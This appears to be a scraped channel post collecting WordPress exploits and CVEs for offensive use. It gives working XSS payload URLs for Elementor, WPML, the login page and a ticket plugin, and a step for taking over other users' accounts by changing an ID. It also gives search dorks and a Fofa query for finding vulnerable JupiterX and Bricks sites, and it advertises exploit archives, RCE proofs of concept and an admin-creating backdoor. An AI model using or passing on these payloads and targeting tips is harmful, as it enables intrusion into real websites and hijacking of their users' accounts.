Collection of WordPress Exploits and CVEs.
Github
#Wordpress #Exploit #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
WordPress - XSS (CVE-2022-29455)
/wp-content/plugins/elementor/assets/js/frontend.min.js
usage:
https://target_site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==
#wordpress #xss
Exploiting the xmlrpc.php on all WordPress versions
Read Here
#Exploit #WordPress
In the new version of the Zhaket plugin:
zhaket.com/web/wp-advanced-support-ticket
there is a bug that lets you very easily access other people's panels through this plugin.
site.ir/my-account/tickets/?sss=t&ddd=1
Tested payload:
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
Tested payload:
https://site.ir/my-account/tickets/?action=view&ticket-id=22%3Cscript%3Ealert(1)%3C/script%3E
Replace the number 1 with the numeric ID of the target user. You will be logged in automatically.
site.ir/my-account/tickets/?sss=t&ddd=1
#XSS #WordPress
WordPress login page allows un-auth cross-site scripting (XSS)
Payload :
%22%20accesskey%3dx%20onclick%3dalert(1)%2f%2f
#xss #wordpress
WordPress Plugin WPML Version < 4.6.1 RXSS vulnerability
Nuclei template: Github
Payload :
https://xxxxxxx/wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(0)%0c
#Wordpress #0day #xss
CVE-2023-2982
WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) <= 7.6.4 - Authentication Bypass
Github
#bypass #wordpress
#Exploit #Wordpress #JupiterX #Plugin
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln
Dork :
inurl: wp-content/plugins/jupiterx-core/
Shared By XP4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
CVE-2023-38389-@LearnExploit.rar
726.6 KB
#Exploit #Wordpress #JupiterX #Plugin
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln
Dork :
inurl: wp-content/plugins/jupiterx-core/
Note: run it with Python 2.7, otherwise you will get an error.
Shared By XP4
CVE-2023-37988 - Wordpress/Plugin - Contact Form Generator [RXSS]
Github
#CVE #Wordpress #RXSS
Backdoor that creates an admin user with permanent access
Link File
#backdoor #wordpress
imem!
CVE-2023-6875 - Authorization Bypass vulnerability in POST SMTP Mailer, a WordPress plugin with over 300,000+ active installations
POC
Read
#Bypass #CVE #POC #Wordpress
PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks - 1.9.6 CVSS 9.8
Query Fofa: body="/wp-content/themes/bricks/"
POC
Nuclei
#POC #Wordpress #RCE #CVE